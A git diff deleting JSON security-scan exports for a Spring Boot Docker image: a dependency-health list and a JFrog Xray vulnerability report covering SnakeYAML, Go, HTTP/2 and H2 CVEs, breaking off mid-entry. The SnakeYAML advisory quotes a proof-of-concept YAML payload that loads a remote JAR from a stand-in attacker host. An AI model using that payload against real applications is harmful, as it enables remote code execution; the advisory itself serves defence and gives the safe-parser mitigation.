"jakarta.xml.bind:jakarta.xml.bind-api", - "version_in_use": "4.0.0", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "4.0.1", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.latencyutils:LatencyUtils", - "version_in_use": "2.0.3", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "2.0.3", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-aop", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:53:00Z", - "latest_version": "6.0.13", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-aspects", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:53:00Z", - "latest_version": "6.0.13", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-tx", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:53:00Z", - "latest_version": "6.0.13", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.apache.tomcat.embed:tomcat-embed-el", - "version_in_use": "10.1.12", - "risk": "Medium", - "risk_reason": "Number of new versions", - "is_eol": null, - "released": "2023-08-08T19:51:00Z", - "latest_version": "11.0.0-M12", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.slf4j:jul-to-slf4j", - "version_in_use": "2.0.7", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "2.0.9", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-orm", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:53:00Z", - "latest_version": "6.0.13", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.unbescape:unbescape", - "version_in_use": "1.1.6.RELEASE", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "1.1.6.RELEASE", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "com.fasterxml.jackson.datatype:jackson-datatype-jsr310", - "version_in_use": "2.15.2", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-05-30T23:45:35Z", - "latest_version": "2.15.3", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.hibernate.orm:hibernate-core", - "version_in_use": "6.2.7.Final", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-20T19:13:00Z", - "latest_version": "6.3.1.Final", - "cadence": 2, - "committers": null, - "commits": null - }, - { - "component": "org.slf4j:slf4j-api", - "version_in_use": "2.0.7", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "2.0.9", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-core", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:54:00Z", - "latest_version": "6.0.13", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "com.fasterxml.jackson.core:jackson-databind", - "version_in_use": "2.15.2", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-05-30T23:27:37Z", - "latest_version": "2.15.3", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.antlr:antlr4-runtime", - "version_in_use": "4.10.1", - "risk": "Low", - "risk_reason": "Number of new versions and Version Age", - "is_eol": null, - "released": "2022-04-15T21:46:00Z", - "latest_version": "4.13.1", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.aspectj:aspectjweaver", - "version_in_use": "1.9.20", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-08-16T06:41:25Z", - "latest_version": "1.9.20.1", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-jdbc", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:54:00Z", - "latest_version": "6.0.13", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.yaml:snakeyaml", - "version_in_use": "1.33", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "2.2", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "net.bytebuddy:byte-buddy", - "version_in_use": "1.14.6", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-08-14T19:43:00Z", - "latest_version": "1.14.9", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "com.google.errorprone:error_prone_annotations", - "version_in_use": "2.21.1", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-08-04T21:37:00Z", - "latest_version": "2.22.0", - "cadence": 3, - "committers": null, - "commits": null - }, - { - "component": "jakarta.annotation:jakarta.annotation-api", - "version_in_use": "2.1.1", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "2.1.1", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "javax.cache:cache-api", - "version_in_use": "1.1.1", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "2019-05-10T06:07:00Z", - "latest_version": "1.1.1", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.apache.tomcat.embed:tomcat-embed-websocket", - "version_in_use": "10.1.12", - "risk": "Medium", - "risk_reason": "Number of new versions", - "is_eol": null, - "released": "2023-08-08T19:51:00Z", - "latest_version": "11.0.0-M12", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework.data:spring-data-commons", - "version_in_use": "3.1.3", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-08-18T12:12:00Z", - "latest_version": "3.1.4", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-context-support", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:53:00Z", - "latest_version": "6.0.13", - "cadence": 5, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-web", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:54:00Z", - "latest_version": "6.0.13", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "jakarta.persistence:jakarta.persistence-api", - "version_in_use": "3.1.0", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "3.1.0", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "jakarta.validation:jakarta.validation-api", - "version_in_use": "3.0.2", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "3.0.2", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.apache.logging.log4j:log4j-to-slf4j", - "version_in_use": "2.20.0", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "3.0.0-alpha1", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.hibernate.common:hibernate-commons-annotations", - "version_in_use": "6.0.6.Final", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "6.0.6.Final", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "com.fasterxml.jackson.core:jackson-core", - "version_in_use": "2.15.2", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-05-30T22:17:00Z", - "latest_version": "2.15.3", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "jakarta.activation:jakarta.activation-api", - "version_in_use": "2.1.2", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "2.1.2", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework.data:spring-data-jpa", - "version_in_use": "3.1.3", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-08-18T12:14:00Z", - "latest_version": "3.1.4", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-beans", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:53:00Z", - "latest_version": "6.0.13", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-context", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:54:00Z", - "latest_version": "6.0.13", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-jcl", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:53:00Z", - "latest_version": "6.0.13", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.webjars.npm:font-awesome", - "version_in_use": "4.7.0", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "2017-09-30T12:24:34Z", - "latest_version": "4.7.0", - "cadence": 0, - "committers": 1, - "commits": 3 - }, - { - "component": "io.micrometer:micrometer-observation", - "version_in_use": "1.11.3", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-08-14T22:58:00Z", - "latest_version": "1.11.5", - "cadence": 3, - "committers": null, - "commits": null - }, - { - "component": "org.eclipse.angus:angus-activation", - "version_in_use": "2.0.1", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-04-27T13:21:42Z", - "latest_version": "2.0.1", - "cadence": 3, - "committers": null, - "commits": null - }, - { - "component": "org.springframework.boot:spring-boot-jarmode-layertools", - "version_in_use": "3.1.3", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-08-24T10:23:54Z", - "latest_version": "3.1.4", - "cadence": 7, - "committers": null, - "commits": null - }, - { - "component": "com.fasterxml.jackson.datatype:jackson-datatype-jdk8", - "version_in_use": "2.15.2", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-05-30T23:45:31Z", - "latest_version": "2.15.3", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "com.sun.istack:istack-commons-runtime", - "version_in_use": "4.1.2", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "4.2.0", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "jakarta.inject:jakarta.inject-api", - "version_in_use": "2.0.1", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "2021-10-16T18:56:00Z", - "latest_version": "2.0.1.MR", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-expression", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:54:00Z", - "latest_version": "6.0.13", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.webjars.npm:bootstrap", - "version_in_use": "5.2.3", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2022-11-23T02:00:00Z", - "latest_version": "5.3.2", - "cadence": 3, - "committers": null, - "commits": null - }, - { - "component": "com.fasterxml.jackson.module:jackson-module-parameter-names", - "version_in_use": "2.15.2", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-05-30T23:45:37Z", - "latest_version": "2.15.3", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "com.h2database:h2", - "version_in_use": "2.1.214", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "2022-06-14T18:50:00Z", - "latest_version": "2.2.224", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "io.micrometer:micrometer-commons", - "version_in_use": "1.11.3", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-08-14T22:58:00Z", - "latest_version": "1.11.5", - "cadence": 3, - "committers": null, - "commits": null - }, - { - "component": "org.hdrhistogram:HdrHistogram", - "version_in_use": "2.1.12", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "2.1.12", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.springframework:spring-webmvc", - "version_in_use": "6.0.11", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-07-13T08:53:00Z", - "latest_version": "6.0.13", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "com.fasterxml.jackson.core:jackson-annotations", - "version_in_use": "2.15.2", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-05-30T20:34:00Z", - "latest_version": "2.15.3", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "io.micrometer:micrometer-core", - "version_in_use": "1.11.3", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2023-08-14T22:58:00Z", - "latest_version": "1.11.5", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "io.smallrye:jandex", - "version_in_use": "3.0.5", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2022-12-02T15:07:00Z", - "latest_version": "3.1.5", - "cadence": 4, - "committers": null, - "commits": null - }, - { - "component": "org.apache.tomcat.embed:tomcat-embed-core", - "version_in_use": "10.1.12", - "risk": "Medium", - "risk_reason": "Number of new versions", - "is_eol": null, - "released": "2023-08-08T19:50:00Z", - "latest_version": "11.0.0-M12", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "com.fasterxml:classmate", - "version_in_use": "1.5.1", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "1.6.0", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "com.zaxxer:HikariCP", - "version_in_use": "5.0.1", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "5.0.1", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "org.apache.logging.log4j:log4j-api", - "version_in_use": "2.20.0", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "3.0.0-alpha1", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": "bootstrap", - "version_in_use": "5.2.3", - "risk": "None", - "risk_reason": "None", - "is_eol": null, - "released": "2022-11-22T07:47:10Z", - "latest_version": "5.3.0-alpha3", - "cadence": 9, - "committers": null, - "commits": null - }, - { - "component": "font-awesome", - "version_in_use": "4.7.0", - "risk": "High", - "risk_reason": "Health", - "is_eol": null, - "released": "2016-10-24T21:33:40Z", - "latest_version": "4.7.0", - "cadence": 0, - "committers": null, - "commits": null - } -] diff --git a/Docker_07f669c_Security_Export.json b/Docker_07f669c_Security_Export.json deleted file mode 100755 index 6119f1a63..000000000 --- a/Docker_07f669c_Security_Export.json +++ /dev/null @@ -1,840 +0,0 @@ -{ - "total_count": 12, - "data": [ - { - "id": "XRAY-262821", - "severity": "Critical", - "severity_source": "CVSS V3 from NVD", - "pkg_type": "maven", - "summary": "SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.", - "issue_type": "security", - "provider": "JFrog", - "component": "org.yaml:snakeyaml", - "source_id": "gav://org.yaml:snakeyaml", - "source_comp_id": "gav://org.yaml:snakeyaml:1.33", - "component_versions": { - "id": "org.yaml:snakeyaml", - "vulnerable_versions": [ - "≤ 1.33" - ], - "fixed_versions": [ - "2.0" - ], - "more_details": { - "cves": [ - { - "cve": "CVE-2022-1471", - "cwe": [ - "CWE-502" - ], - "cvss_v3": "9.8/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" - } - ], - "description": "SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.", - "provider": "JFrog" - } - }, - "edited": "2023-01-05T15:59:00Z", - "is_source_root": false, - "is_high_profile": true, - "high_profile_info": { - "Id": 0, - "PublicVulnsTblID": 0, - "VulnId": "XRAY-262821", - "VulnerabilityTitle": "", - "ShortDescription": "A design problem in SnakeYAML leads to remote code execution when deserializing untrusted YAML data.", - "FullDescription": "[SnakeYAML](https://bitbucket.org/snakeyaml/snakeyaml/) is a popular Java-based YAML parsing that provides a high-level API for serialization and deserialization of YAML documents.\n\nIt was discovered that a crafted YAML file containing a Java `Constructor` can lead to remote code execution due to deserialization.\n\nSnakeYaml's Constructor class, which inherits from SafeConstructor, allows any class type to be deserialized. A ConstructorException is thrown, but only after the malicious\npayload is deserialized.\n\nTo exploit this issue, an attacker must find remote input that propagates into the `Yaml.load()` method. \nThe attacker must deserialize a [Java \"gadget\" class](http://frohoff.github.io/owaspsd-deserialize-my-shorts/) that's available in the application's classpath in order to achieve code execution via the deserialization. However - there are gadget classes that are available by default such as the built-in `javax.script.ScriptEngineManager`.\n\nA remote code execution PoC example, using the Java built-in class `javax.script.ScriptEngineManager`:\n```\nString strYaml = \"!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader \"\n + \"[[!!java.net.URL [\\\"http://attacker.com\\\"]]]]\";;\nYaml yaml = new Yaml(new Constructor(Foo.class));\nyaml.load(strYaml);\n```\nThe PoC will run an arbitrary JAR file supplied from `http://attacker.com`. Note that even though `Constructor` receives a specific class type (`Foo.class`), any gadget class can be deserialized.\n\nNote that the vulnerability will not apply to applications that use the (non-default) `SafeConstructor`", - "Impact": 7, - "VulnerabilityType": "Remote code execution", - "Resolution": "##### Development mitigations\n\nUse the (non-default) `SafeConstructor` class to initialize the `Yaml` class -\n```\nLoaderOptions options = new LoaderOptions();\nYaml yaml = new Yaml(new SafeConstructor(options));\nString strYaml = Files.readString(Path.of(\"input_file\")); \nString parsed = yaml.load(strYaml);\n```\n\nNote that this class will only allow deserialization of [basic types](https://github.com/Thinkofname/snakeyaml/blob/master/src/main/java/org/yaml/snakeyaml/constructor/SafeConstructor.java#L52) such as Integers, Strings, Maps etc.", - "ExtendedImpactReasons": [ - { - "Id": 0, - "PublicVulnsExtendedTblId": 0, - "Name": "The issue has an exploit published", - "Description": "PoC demonstrates remote code execution.", - "IsPositive": 0, - "InsertOrder": 4 - }, - { - "Id": 0, - "PublicVulnsExtendedTblId": 0, - "Name": "Exploitation of the issue is only possible when the vulnerable component is used in a specific manner. The attacker has to perform per-target research to determine the vulnerable attack vector", - "Description": "An attacker must find remote input that propagates into the `Yaml.load()` method. The `Yaml` class must be initialized either with no arguments (default initialization) or with a `Constructor` instance. The vulnerability can still be exploited even if the `Constructor` instance is initialized with a specific class type.", - "IsPositive": 1, - "InsertOrder": 1 - }, - { - "Id": 0, - "PublicVulnsExtendedTblId": 0, - "Name": "The issue results in a severe impact (such as remote code execution)", - "Description": "Remote code execution.", - "IsPositive": 0, - "InsertOrder": 2 - }, - { - "Id": 0, - "PublicVulnsExtendedTblId": 0, - "Name": "The prerequisites for exploiting the issue are either extremely common or nonexistent (always exploitable)", - "Description": "It is highly likely that SnakeYAML will be used to parse externally-supplied YAML data. In addition, the vulnerability is exploitable when the `Yaml` class is initialized with default arguments.", - "IsPositive": 0, - "InsertOrder": 3 - } - ], - "ExtendedReferences": [ - { - "Id": 0, - "PublicVulnsExtendedTblId": 0, - "RefType": "Patch", - "Title": "Fixing commit", - "Url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/2b8d47c8bcfd402e7a682b7b2674e8d0cb25e522", - "InsertOrder": 1 - }, - { - "Id": 0, - "PublicVulnsExtendedTblId": 0, - "RefType": "Advisory", - "Title": "GitHub Advisory", - "Url": "https://github.com/advisories/GHSA-mjmj-j48q-9wg2", - "InsertOrder": 2 - } - ], - "ExtendedRelatedVulns": null - }, - "component_physical_paths": [ - "sha256__2547a948987c670df3f6e9575f90adb629f64de0711765dee6fc4c615ee2d120.tar.gz/workspace/BOOT-INF/lib/snakeyaml-1.33.jar" - ] - }, - { - "id": "XRAY-533052", - "severity": "Critical", - "severity_source": "NVD", - "pkg_type": "go", - "summary": "Line directives (\"//line\") can be used to bypass the restrictions on \"//go:cgo_\" directives, allowing blocked linker and compiler flags to be passed during compilation. This can result in unexpected execution of arbitrary code when running \"go build\". The line directive requires the absolute path of the file in which the directive lives, which makes exploiting this issue significantly more complex.", - "issue_type": "security", - "provider": "JFrog", - "component": "github.com/golang/go", - "source_id": "go://github.com/golang/go", - "source_comp_id": "go://github.com/golang/go:1.19.11", - "component_versions": { - "id": "github.com/golang/go", - "vulnerable_versions": [ - "< 1.20.9", - "1.21.0-0 ≤ Version < 1.21.2" - ], - "fixed_versions": [ - "1.20.9", - "1.21.2" - ], - "more_details": { - "cves": [ - { - "cve": "CVE-2023-39323", - "cwe": [ - "NVD-CWE-noinfo" - ], - "cvss_v3": "9.8/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" - } - ], - "description": "Line directives (\"//line\") can be used to bypass the restrictions on \"//go:cgo_\" directives, allowing blocked linker and compiler flags to be passed during compilation. This can result in unexpected execution of arbitrary code when running \"go build\". The line directive requires the absolute path of the file in which the directive lives, which makes exploiting this issue significantly more complex.", - "provider": "JFrog" - } - }, - "edited": "0001-01-01T00:00:00Z", - "is_source_root": false, - "is_high_profile": false, - "component_physical_paths": [ - "sha256__6b2f3c473f38b33b59e7b51e8ffd3e3e3a32137c664b8490b5699c243dd76ea4.tar.gz/cnb/lifecycle/launcher/github.com/golang/go" - ] - }, - { - "id": "XRAY-533052", - "severity": "Critical", - "severity_source": "NVD", - "pkg_type": "go", - "summary": "Line directives (\"//line\") can be used to bypass the restrictions on \"//go:cgo_\" directives, allowing blocked linker and compiler flags to be passed during compilation. This can result in unexpected execution of arbitrary code when running \"go build\". The line directive requires the absolute path of the file in which the directive lives, which makes exploiting this issue significantly more complex.", - "issue_type": "security", - "provider": "JFrog", - "component": "github.com/golang/go", - "source_id": "go://github.com/golang/go", - "source_comp_id": "go://github.com/golang/go:1.20.5", - "component_versions": { - "id": "github.com/golang/go", - "vulnerable_versions": [ - "< 1.20.9", - "1.21.0-0 ≤ Version < 1.21.2" - ], - "fixed_versions": [ - "1.20.9", - "1.21.2" - ], - "more_details": { - "cves": [ - { - "cve": "CVE-2023-39323", - "cwe": [ - "NVD-CWE-noinfo" - ], - "cvss_v3": "9.8/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" - } - ], - "description": "Line directives (\"//line\") can be used to bypass the restrictions on \"//go:cgo_\" directives, allowing blocked linker and compiler flags to be passed during compilation. This can result in unexpected execution of arbitrary code when running \"go build\". The line directive requires the absolute path of the file in which the directive lives, which makes exploiting this issue significantly more complex.", - "provider": "JFrog" - } - }, - "edited": "0001-01-01T00:00:00Z", - "is_source_root": false, - "is_high_profile": false, - "component_physical_paths": [ - "sha256__61e0cfcb6f3543ca620b2da9d5e475cb85dd48e92d82e119919ea667f4371a6c.tar.gz/layers/paketo-buildpacks_ca-certificates/helper/helper/github.com/golang/go", - "sha256__133f79a6622aaa0495c72cc6a3b2e8bd35f7e5222ec86d7fea75f1563ee54a68.tar.gz/layers/paketo-buildpacks_bellsoft-liberica/helper/helper/github.com/golang/go", - "sha256__3f5f857a24121a63acf8e6415c9cec7790df50647a8bcb4e0f1278ece3826345.tar.gz/layers/paketo-buildpacks_spring-boot/helper/helper/github.com/golang/go" - ] - }, - { - "id": "XRAY-533304", - "severity": "High", - "severity_source": "NVD", - "pkg_type": "go", - "summary": "The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.", - "issue_type": "security", - "provider": "JFrog", - "component": "golang.org/x/net", - "source_id": "go://golang.org/x/net", - "source_comp_id": "go://golang.org/x/net:0.11.0", - "component_versions": { - "id": "golang.org/x/net", - "vulnerable_versions": [ - "< 0.17.0" - ], - "fixed_versions": [ - "0.17.0" - ], - "more_details": { - "cves": [ - { - "cve": "CVE-2023-44487", - "cwe": [ - "CWE-400" - ], - "cvss_v3": "7.5/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" - } - ], - "description": "The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.", - "provider": "JFrog" - } - }, - "edited": "0001-01-01T00:00:00Z", - "is_source_root": false, - "is_high_profile": false, - "component_physical_paths": [ - "sha256__133f79a6622aaa0495c72cc6a3b2e8bd35f7e5222ec86d7fea75f1563ee54a68.tar.gz/layers/paketo-buildpacks_bellsoft-liberica/helper/helper/golang.org/x/net" - ] - }, - { - "id": "XRAY-261922", - "severity": "High", - "severity_source": "NVD", - "pkg_type": "maven", - "summary": "** DISPUTED ** The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states \"This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that.\"", - "issue_type": "security", - "provider": "JFrog", - "component": "com.h2database:h2", - "source_id": "gav://com.h2database:h2", - "source_comp_id": "gav://com.h2database:h2:2.1.214", - "component_versions": { - "id": "com.h2database:h2", - "vulnerable_versions": [ - "< 2.2.220" - ], - "fixed_versions": [ - "2.2.220" - ], - "more_details": { - "cves": [ - { - "cve": "CVE-2022-45868", - "cwe": [ - "CWE-200", - "CWE-312" - ], - "cvss_v3": "7.8/CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "description": "** DISPUTED ** The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states \"This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that.\"", - "provider": "JFrog" - } - }, - "edited": "2023-01-08T19:24:00Z", - "is_source_root": false, - "is_high_profile": true, - "high_profile_info": { - "Id": 0, - "PublicVulnsTblID": 0, - "VulnId": "XRAY-261922", - "VulnerabilityTitle": "", - "ShortDescription": "(Non-issue) Incorrect usage of the H2 Database Engine may result in password leakage for the H2 Console.", - "FullDescription": "[h2database](https://github.com/h2database/h2database) is an open-source lightweight Java Database. H2 Database supports standard database APIs such as SQL and JDBC API. The H2 Database can also be used in embedded and server modes. H2 Database has a web-based admin console that can be initialized via the CLI. The console is accessible via tool options that are declared by the H2 Database. \n\nThe H2 console supports the `-webAdminPassword` CLI argument which takes the web admin password as a value. Specifying this password in the CLI is unsafe since local attackers will be able to see the password in plain text when the process list is shown with the arguments used to run them.\n\nThis vulnerability is a non-issue since passing passwords via the CLI is a well-known bad practice, and does not relate specifically to the H2 Database Engine.", - "Impact": 4, - "VulnerabilityType": "Local privilege escalation", - "Resolution": "", - "ExtendedImpactReasons": [ - { - "Id": 0, - "PublicVulnsExtendedTblId": 0, - "Name": "The issue has been disputed by the vendor", - "Description": "This vulnerability is a non-issue since passing passwords via the CLI is a well-known bad practice, and does not relate specifically to the H2 Database Engine.", - "IsPositive": 1, - "InsertOrder": 1 - } - ], - "ExtendedReferences": [ - { - "Id": 0, - "PublicVulnsExtendedTblId": 0, - "RefType": "Technical Writeup", - "Title": "Vulnerability report + technical writeup", - "Url": "https://sites.google.com/sonatype.com/vulnerabilities/sonatype-2022-6243?pli=1", - "InsertOrder": 1 - } - ], - "ExtendedRelatedVulns": null - }, - "component_physical_paths": [ - "sha256__2547a948987c670df3f6e9575f90adb629f64de0711765dee6fc4c615ee2d120.tar.gz/workspace/BOOT-INF/lib/h2-2.1.214.jar" - ] - }, - { - "id": "XRAY-531550", - "severity": "Medium", - "severity_source": "NVD", - "pkg_type": "go", - "summary": "The html/template package does not properly handle HTML-like \"\" comment tokens, nor hashbang \"#!\" comment tokens, in